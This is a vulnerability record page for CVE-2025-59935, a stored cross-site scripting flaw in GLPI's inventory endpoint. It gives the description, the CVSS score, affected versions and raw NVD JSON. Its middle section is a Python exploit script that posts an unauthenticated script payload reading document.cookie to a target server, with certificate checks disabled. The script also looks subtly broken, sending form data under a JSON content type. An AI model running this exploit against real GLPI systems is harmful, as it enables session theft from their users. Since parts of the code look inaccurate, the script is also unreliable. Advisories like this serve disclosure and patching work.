Security Vulnerability Report
CVE-2025-59935 CVSS 6.5 MEDIUM

CVE-2025-59935

Published: 2025-12-16 17:16:10
Last Modified: 2026-02-02 14:59:29

Description

GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.21, an unauthenticated user can store an XSS payload through the inventory endpoint. Users should upgrade to 10.0.21 to receive a patch.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* - VULNERABLE
GLPI 10.0.0 - 10.0.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-59935 PoC - GLPI Inventory Endpoint Stored XSS
# Target: GLPI versions 10.0.0 to 10.0.20
# Author: Security Researcher

TARGET_URL = "http://target-glpi-server"  # Replace with actual target URL
INVENTORY_ENDPOINT = f"{TARGET_URL}/front/inventory.php"

# Malicious XSS payload
xss_payload = '<script>alert(document.cookie)</script>'

# Construct the inventory request with XSS payload
inventory_data = {
    "itemtype": "Computer",
    "entities_id": 0,
    "name": f"TestComputer{xss_payload}",
    "serial": f"SN-{xss_payload}",
    "uuid": f"550e8400-e29b-41d4-a716-446655440000{xss_payload}"
}


def exploit():
    """
    Exploit stored XSS via GLPI inventory endpoint.
    The XSS payload will be stored and executed when other users view the inventory.
    """
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Exploiting CVE-2025-59935: Stored XSS in inventory endpoint")

    try:
        # Send inventory request with XSS payload
        response = requests.post(
            INVENTORY_ENDPOINT,
            data=inventory_data,
            headers={
                "Content-Type": "application/json",
                "User-Agent": "GLPI-Inventory-Agent/1.0"
            },
            timeout=30,
            verify=False
        )

        print(f"[+] Request sent. Status code: {response.status_code}")

        if response.status_code == 200:
            print(f"[+] XSS payload may have been stored successfully")
            print(f"[*] Payload: {xss_payload}")
            print(f"[*] The XSS will execute when users access the inventory page")
        else:
            print(f"[-] Unexpected response: {response.text}")

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    exploit()

References

https://github.com/glpi-project/glpi/security/advisories/GHSA-j8vv-9f8m-r7jx (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-59935",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-16T17:16:10.137",
    "lastModified": "2026-02-02T14:59:28.943",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.21, an unauthenticated user can store an XSS payload through the inventory endpoint. Users should upgrade to 10.0.21 to receive a patch."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "10.0.0",
                "versionEndExcluding": "10.0.21",
                "matchCriteriaId": "71497A1A-8C87-48D5-9BA2-CFFF057BC3A7"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/glpi-project/glpi/security/advisories/GHSA-j8vv-9f8m-r7jx",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}